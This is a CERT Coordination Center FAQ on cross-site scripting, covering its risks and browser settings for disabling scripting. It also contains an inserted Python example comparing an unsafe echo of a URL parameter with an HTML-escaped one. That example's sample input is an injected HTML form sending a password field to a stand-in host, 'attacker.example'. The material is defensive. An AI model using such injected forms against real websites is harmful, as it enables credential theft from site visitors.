
CERT® Coordination Center

Frequently Asked Questions About Malicious Web Scripts Redirected by Web Sites

Original release date: February 2, 2000
Last updated: December 7, 2004


A problem has been identified that can be found on a wide variety of web sites: what you receive from a web site may not be what that site meant to send. If you click on a specially designed link, the site may unknowingly send you bad data, unwanted pictures, and programs (malicious scripts) to compromise your data.

The problem is not with web browsers themselves but with how web pages are constructed and how data entering and leaving web sites is validated. "Validate" means ensuring no "unintended" characters are sent back to the client.

This document includes:

  1. Frequently Asked Questions
  2. Steps for Changing Your Options in Web Browsers

I. Frequently Asked Questions

How do malicious web scripts get to my web browser?

A malicious web developer may attach a script to something you send to a web site, such as a URL, an element in a form, or a database inquiry. When the web site responds to you, the malicious script comes along, so that it is now on your browser.

Among the ways you can potentially expose your web browser to malicious scripts are these:

  • following untrusted links in web pages, email messages, or newsgroup postings
  • using interactive forms on an untrustworthy site
  • viewing dynamically generated pages that contain content developed by anyone but yourself

What might happen if my web browser is exposed to a malicious script?

Among the possibilities are that an attacker could capture your password and other information you believe is protected. You should also be concerned because malicious scripts can be used to expose restricted parts of your organization's local network (such as its intranet) to attackers who are on the Internet.

Some web browsers contain vulnerabilities in the security systems that determine what access a script should have to your computer or other web sites. In the case of these cross-zone or cross-domain vulnerabilities, a malicious script could download and install arbitrary software on your computer, or read or modify data on another web site.

Malicious scripts can also be used to alter the appearance of the browser, thus making social engineering or "phishing" attacks more successful. For example, a malicious script might open a browser window outside of the visible screen area or cover the address bar with a spoofed address.

Attackers may be able to use malicious scripts to infect cookies with copies of themselves. If the infected cookie is sent back to a vulnerable web site and passed back to your browser, the malicious script may start running again. Note: This is not a vulnerability in web cookies; rather, a malicious script takes advantage of the functionality of cookies.

How can I avoid the problem?

The most significant impact of this vulnerability can be avoided by disabling all scripting languages. Follow the steps below to turn off options in your web browser that allow malicious scripts to run. If you're not using a current version of Internet Explorer, Netscape, or Mozilla, you might need to modify the steps.

Note that even with scripting disabled, attackers may still be able to influence the appearance of content provided by a legitimate site by embedding other HTML tags. In particular, malicious use of the <FORM> tag is not prevented by disabling scripting languages.
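The server-side fix the FAQ alludes to ("ensuring no unintended characters are sent back to the client") is shown below as an added example, not code from CERT or from the advisory: a page that echoes a URL parameter verbatim, beside the same page with HTML escaping applied. The constructed sample input carries a <FORM> tag, since that is the case the preceding paragraph points out survives even when scripting is disabled; the host names and the parameter name "q" are assumptions.

```python
import html
from urllib.parse import urlencode, parse_qs, urlsplit

# Constructed sample: a link that smuggles an HTML form into a search parameter.
# "attacker.example" and "www.example.com" are placeholder hosts, not real sites.
SAMPLE_QUERY = '<form action="http://attacker.example/">password: <input name="pw"></form>'
SAMPLE_URL = "http://www.example.com/search?" + urlencode({"q": SAMPLE_QUERY})


def query_from_url(url):
    """Extract the 'q' parameter exactly as a web server would receive it."""
    params = parse_qs(urlsplit(url).query)
    return params.get("q", [""])[0]


def render_unsafe(query):
    """Vulnerable page: the visitor's input is copied into the HTML unchanged,
    so any tag it contains (script, form, ...) becomes part of the page."""
    return f"<p>Results for: {query}</p>"


def render_safe(query):
    """Hardened page: every character that has meaning in HTML is encoded,
    so the input is displayed as text and cannot introduce a tag or attribute."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def echo_is_inert(query):
    """True when escaping leaves no character that could open a tag or attribute."""
    escaped = html.escape(query, quote=True)
    return not any(c in escaped for c in '<>"\'')


if __name__ == "__main__":
    q = query_from_url(SAMPLE_URL)
    print("unsafe:", render_unsafe(q))
    print("safe:  ", render_safe(q))
    print("inert: ", echo_is_inert(q))
```

The unsafe version emits a working form pointing at the attacker's host; the safe version shows the same text literally, which also neutralizes script tags and event attributes in the same way.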

How will turning off the options affect my use of the web?

While turning off the options will keep you from being vulnerable to malicious scripts, it will limit the interaction you can have with some web sites. You may notice a difference in functionality when you visit legitimate sites that use scripts running within the browser to add useful features.

Should I disable Java applets?

The risk associated with Java applets is significantly different from some of the other technologies. Java has a robust security mechanism designed to deal with situations like these that prevents sensitive information from being disclosed or client information from being damaged.

However, Java applets written by an attacker can still be loaded while you are viewing a legitimate web page. The problems that can arise are similar to those involving the <FORM> and other HTML tags. For example, an attacker could develop a "Trojan Horse" program that presented misleading information and prompted you for a password. If you failed to recognize the malicious applet for what it was, you could accidentally disclose sensitive information.

You must make your own determination about disabling Java applets, based on your tolerance for these risks. If you choose to disable Java, please see the detailed instructions below.

Is there any more information available about this problem?

The CERT/CC has published an advisory containing more details about the problem, its impact, and ways to deal with it. CA-2000-02 is available from

You can also find information at the vendor URLs listed in the advisory.

The CERT/CC has also published a "tech tip" for web page developers and web site administrators, which you might want to pass along to the appropriate people in your organization. This document, "Malicious Content Mitigation for Web Developers," is available from


II. Steps for Changing Your Options in Web Browsers - Netscape, Mozilla, and Internet Explorer

Using Netscape 6

Note: Make sure that these instructions apply to your version of Netscape. To determine your software version, from the Help menu, select About Communicator.... A web page appears with information about your browser including the version number.

  1. Start Netscape Communicator as you would when browsing the Internet.
  2. From the Edit menu, select Preferences. The Preferences dialog box appears.
  3. From the Category list, click on Advanced. (Do NOT click on the plus (+) sign.) The Advanced Preferences panel appears.
  4. If you decide to disable Java, uncheck Enable Java.
  5. Uncheck Enable JavaScript.
  6. Click OK to accept the changes.
  7. Click the Padlock Icon in the lower left hand corner of your browser. The Security Info dialog box appears.
  8. Click the Navigator link from the list on the left. The Navigator Security Settings panel appears.
  9. In the Show a warning before: section, make sure the options Viewing a page with encrypted/unencrypted mix and Leaving an encrypted site are checked.
  10. Click OK to accept the changes and close the dialog box.

Using Netscape 7 or Mozilla 1

Note: Make sure that these instructions apply to your version of Netscape or Mozilla. To determine your software version, from the Help menu, select About Communicator... or About Mozilla.... A web page appears with information about your browser including the version number.

  1. Start Netscape Communicator or Mozilla as you would when browsing the Internet.
  2. From the Edit menu, select Preferences. The Preferences dialog box appears.
  3. From the Category list, click on Advanced. (Do NOT click on the plus (+) sign.) The Advanced Preferences panel appears.
  4. If you decide to disable Java, uncheck Enable Java.
  5. Now click on the plus (+) sign next to the word Advanced.
  6. Click on the category Scripts & Plug-Ins.
  7. Uncheck the box Enable Javascript for Navigator.
  8. Uncheck the box Enable JavaScript for Mail & Newsgroups.
  9. From the Category list, click on the plus (+) sign next to Privacy and Security.
  10. Click on the category Popup Windows.
  11. Check the box Block unrequested popup windows.
  12. Click on the category SSL.
  13. Check all the options under section SSL Warnings.
  14. Click OK to accept the changes.

For more technical information about Mozilla security features, see Component Security for Mozilla.

Using Internet Explorer 5 or 6

Note: Make sure that these instructions apply to your version of Internet Explorer. To determine your software version, from the Help menu, select About Internet Explorer.... A dialog box appears with information about your browser including the version number.

  1. Start Internet Explorer as you would when browsing the Internet.
  2. From the Tools menu select Internet Options... . The Internet Options dialog box appears.
  3. Select the Security tab. The Security Options panel appears.
  4. Click on the Internet zone to select it.
  5. Click the Custom Level... button. The Security Settings panel appears.
  6. Select the High option from the pull-down list.
  7. Click the Reset button. A dialog box appears asking if you are sure you want to change the security settings for this zone.
  8. Click Yes. You now need to scroll through the settings list and make the changes listed in the following steps.
  9. For the setting Script ActiveX controls marked safe for Scripting, check the radio button for Disable or Prompt depending on your level of trust.
  10. If you decide to disable Java, for the setting Java permissions, check the radio button for Disable Java. Note: If you have Microsoft Virtual Machine installed, this setting will be under the Microsoft VM section. If you do not have a Java permissions setting, Java is already disabled.
  11. For the setting Active scripting under the Scripting section, confirm that the radio button for Disable is checked.
  12. Click OK to accept these changes. A dialog box appears asking if you are sure you want to make these changes.
  13. Click Yes.
  14. In the Internet Options dialog box, click the Advanced tab. The Advanced Options panel appears.
  15. Make sure the setting Warn if changing between secure and insecure under the Security setting is checked.
  16. Click Apply to save your changes.
  17. Click OK to close the Internet Options dialog box.

More information about Internet Explorer security is available from several Microsoft web pages: Increase Your Browsing and E-Mail Safety, Working with Internet Explorer 6 Security Settings, and Microsoft Knowledge Base Articles 833633 and 182569.


This document is available from: http://www.cert.org/tech_tips/malicious_code_FAQ.html

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.

CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from

If you prefer to use DES, please call the CERT hotline for more information.

Getting security information

CERT publications and other security information are available from our web site

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.


NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.


Conditions for use, disclaimers, and sponsorship information

Copyright 2000 Carnegie Mellon University.


Revision History
Feb 2, 2000         Initial Release
July 2, 2004        Updated browser configuration section and impact of malicious scripts
December 7, 2004    Fixed #ie56 anchor, added Mozilla to section II. title